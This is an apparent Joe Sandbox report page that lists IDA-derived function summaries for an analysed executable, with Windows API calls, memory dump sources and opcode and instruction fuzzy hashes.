      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: IconNotifyShell_Timer$Killwcscpy
      • String ID:
      • API String ID: 3812282468-0
      • Opcode ID: 2d5799521ef17968f8bb941a14b0e5868efdfa1f9d153b0a91d36d331dc2bdb2
      • Instruction ID: baba660d3d56ec005b48606d41f58dd1e434a400d642d9092f16338e0b96733f
      • Opcode Fuzzy Hash: 2d5799521ef17968f8bb941a14b0e5868efdfa1f9d153b0a91d36d331dc2bdb2
      • Instruction Fuzzy Hash: 7831F527E0D7C2A7F7259B11A001279B7A8E785F84F8840B5DE4C07785CE2DD644E760
      APIs
      • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF73A1D6F52,?,?,?,?,?,?,00007FF73A1D782C), ref: 00007FF73A1D6FA5
      • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF73A1D6F52,?,?,?,?,?,?,00007FF73A1D782C), ref: 00007FF73A1D6FD3
      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF73A1D6F52,?,?,?,?,?,?,00007FF73A1D782C), ref: 00007FF73A1D6FFA
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CloseOpenQueryValue
      • String ID:
      • API String ID: 3677997916-0
      • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
      • Instruction ID: 117a8922e8f59de3097bd79c550f85739dc7ee55d932ba414100d92125206661
      • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
      • Instruction Fuzzy Hash: 0A21BB3BA28B4197E7109F25F451A6EB3B4FB89B80B841170EB8C83B14DF39E404EB40
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Process$CurrentExitTerminate
      • String ID:
      • API String ID: 1703294689-0
      • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
      • Instruction ID: eb89ab0e6ddf06ef82895816f895040672c1a9d4304771a97d1892fa30ca28cc
      • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
      • Instruction Fuzzy Hash: 84E04828B0974296FF147B705C4B37553666FC4751F8451B8D90E43396CE3DE448B221
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Init_thread_footer
      • String ID: CALL
      • API String ID: 1385522511-4196123274
      • Opcode ID: 8f2e37acb04d065fbc7b04e3bd052ff60723aacf34b836c6384d0711d15d2f0a
      • Instruction ID: 5c015282d246da0d20eeb737ea2e9e6204f53c0d66ad8ef13d16275030f9161e
      • Opcode Fuzzy Hash: 8f2e37acb04d065fbc7b04e3bd052ff60723aacf34b836c6384d0711d15d2f0a
      • Instruction Fuzzy Hash: 8D229D3AB08642AAFB14EF64E0426ACB7B1FB64B88F804175CA5D57795CF3DE445E320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Library$Load$AddressFreeProc
      • String ID:
      • API String ID: 2632591731-0
      • Opcode ID: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
      • Instruction ID: 2a68d4b13d80b04e9cd270b33fae6c7f4ea1ea3cb6461ff7c99556e50dda378a
      • Opcode Fuzzy Hash: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
      • Instruction Fuzzy Hash: EB416F27A24A52A6FB10FF25E8423BC73B0EB84B88F854571EA4D47689DF3CD444E720
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: IconNotifyShell_
      • String ID:
      • API String ID: 1144537725-0
      • Opcode ID: 75f4a0e65c200bc2e40f9fd9660e43366a6e6660fa9f53215bc3a0a6d933da49
      • Instruction ID: 5ab94afd4aae4d4aefafe551cb94ab7ac457ebd9b361533eb00fe8a9a504842e
      • Opcode Fuzzy Hash: 75f4a0e65c200bc2e40f9fd9660e43366a6e6660fa9f53215bc3a0a6d933da49
      • Instruction Fuzzy Hash: 79419E3A919B85A6F761AF11E4413A9B3B8FB88B88F840175EE8C07749CF7CD154E760
      APIs
      • IsThemeActive.UXTHEME ref: 00007FF73A1D3756
        • Part of subcall function 00007FF73A1F9334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73A1F9348
        • Part of subcall function 00007FF73A1D36E8: SystemParametersInfoW.USER32 ref: 00007FF73A1D3705
        • Part of subcall function 00007FF73A1D36E8: SystemParametersInfoW.USER32 ref: 00007FF73A1D3725
        • Part of subcall function 00007FF73A1D37B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF73A1D3785), ref: 00007FF73A1D37F2
        • Part of subcall function 00007FF73A1D37B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF73A1D3785), ref: 00007FF73A1D3807
        • Part of subcall function 00007FF73A1D37B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF73A1D3785), ref: 00007FF73A1D388D
        • Part of subcall function 00007FF73A1D37B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF73A1D3785), ref: 00007FF73A1D3924
      • SystemParametersInfoW.USER32 ref: 00007FF73A1D3797
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
      • String ID:
      • API String ID: 4207566314-0
      • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
      • Instruction ID: 0b0322f02f36e86206e741c3810de1961f7e8c249f92e0b035606ea960ee7a85
      • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
      • Instruction Fuzzy Hash: B001FB78E0D643AAF714BBA1A817575F261AF84700FC400B5D58D872A2CF3DB585B720
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ErrorFreeHeapLast
      • String ID:
      • API String ID: 485612231-0
      • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
      • Instruction ID: 42d10fd19e513706bf7afea668c892ad2436215e9f422b1b528f07610e7ed3a9
      • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
      • Instruction Fuzzy Hash: F6E08658E09103A6FF14FBF2580B07497919FC8750BC440B0D90DC6252DE2CD4457731
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CloseErrorHandleLast
      • String ID:
      • API String ID: 918212764-0
      • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
      • Instruction ID: 20e40f0753c95a71a5db3ef8c65456ae7a8f0c99a2f2d14c86fb6b2a78428443
      • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
      • Instruction Fuzzy Hash: 92110B28F0C24261FEA4B76569D727D92D15FD4764FC401B4DA2E463C2DD6CE880B322
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ClearVariant
      • String ID:
      • API String ID: 1473721057-0
      • Opcode ID: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
      • Instruction ID: 6446c8e51a263df10d96a6400da2b54a60619c33cd3ebb4c9f640837bd01f62f
      • Opcode Fuzzy Hash: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
      • Instruction Fuzzy Hash: EA41822AB08641A6FB10EF61E0417ACA3B0EB64B84F844575CF0D57786CF7CE495E360
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: HandleModule$AddressFreeLibraryProc
      • String ID:
      • API String ID: 3947729631-0
      • Opcode ID: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
      • Instruction ID: 4942f7f539b38457cc4aa0b73f8d6f3a7a45c3a10499d4e398918d8a83718b2f
      • Opcode Fuzzy Hash: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
      • Instruction Fuzzy Hash: 6541F22DE09693A2FB24FB94E442178A264AF84740FD444B5EA0E476D1DE3DE881B360
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID:
      • API String ID: 3215553584-0
      • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
      • Instruction ID: 2b765bb8fc28b0f65a1253ac186d66d9f9d868473ff53c669c5ff162044216f8
      • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
      • Instruction Fuzzy Hash: 9D21063660868297FB65AF28E84237DB6A1EBC0B90F544234EA5D876D5DF2CD800EB10
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID:
      • API String ID: 3215553584-0
      • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
      • Instruction ID: 402536fe89509f9fa9c263bc7df2de8750b897ca8a8aa2a5e7fc8e94cd717541
      • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
      • Instruction Fuzzy Hash: BB219825A0C68291FA61FF11980217ED2A0BFD5B84F948470EE4C57B86DF7CD941B761
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID:
      • API String ID: 3215553584-0
      • Opcode ID: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
      • Instruction ID: 7b3ce347e12bb698645c9aaf4b7afdb481d6cff8a04d87fe50588f09a1e528b4
      • Opcode Fuzzy Hash: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
      • Instruction Fuzzy Hash: 6011813A90C782AAF620FB54A442139E2A4FBC4380F8400B5E68D47791DF3CE880B722
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
      • Instruction ID: c94c482b72a269a8bacbb7f229b608eae66184e3c51e3ee3915606196d4b9159
      • Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
      • Instruction Fuzzy Hash: 051130AAA0C646A6FA15BF55D8422ADF761ABC4750FD04172EA4D066D6CF7CE000FB21
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID:
      • API String ID: 3215553584-0
      • Opcode ID: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
      • Instruction ID: 9bf2d00b2f01f9ca9ba1bd1cc100d82356d265c029f7bffa3adcabc77c3b4c37
      • Opcode Fuzzy Hash: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
      • Instruction Fuzzy Hash: 4A018429E0820B61FD28FA75991337891505FE4764FA483B0E92D462D2CE3CE8417322
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID:
      • API String ID: 3215553584-0
      • Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
      • Instruction ID: baf827a26d81fd41364adb1ba4d6e1d2b3eafa3d643ed90da9a18991256da94c
      • Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
      • Instruction Fuzzy Hash: 7BF0BB25A0C14765F924F775750327DE2905FD0754F94D270F95D862C7CE2CD441B632
      APIs
        • Part of subcall function 00007FF73A204970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73A204999
      • FreeLibrary.KERNEL32(?,?,?,00007FF73A21C8FE), ref: 00007FF73A1D656F
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: FreeLibrary_invalid_parameter_noinfo
      • String ID:
      • API String ID: 3938577545-0
      • Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
      • Instruction ID: 1b86d7565f9fc430fc27f39e257526fd9b834dec949321016f2f8d220f695c0f
      • Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
      • Instruction Fuzzy Hash: 30F0B457A2560592FF19FF70E0523386370BB54F48F5408B0C91D46148CF2CD494E351
      APIs
      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF73A1F4C5C
        • Part of subcall function 00007FF73A1F5600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF73A1F5609
        • Part of subcall function 00007FF73A1F5600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF73A1F561A
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
      • String ID:
      • API String ID: 1680350287-0
      • Opcode ID: ad801c2c3584bf2bf8cc338021b3875574537b688fb6d0f9b5ce0c86e08b9346
      • Instruction ID: d36566c33a163713f1c265c712e97348bbeeb6af415e534c738b36d407347935
      • Opcode Fuzzy Hash: ad801c2c3584bf2bf8cc338021b3875574537b688fb6d0f9b5ce0c86e08b9346
      • Instruction Fuzzy Hash: 96E0EC48E1F18765FF68B562394707881640FA83B0ED82BB0DB7E452C7BD1CB4517130
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: LongNamePath
      • String ID:
      • API String ID: 82841172-0
      • Opcode ID: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
      • Instruction ID: d525b30d86be4d85bafee7144fe49d564f5345dd50a0e1b41b161592f731a5cf
      • Opcode Fuzzy Hash: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
      • Instruction Fuzzy Hash: 4FE09226B0864295E721AB25E5853A8A3A5BB8CBC4F844031FE8C4375ACD6CC5849A10
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
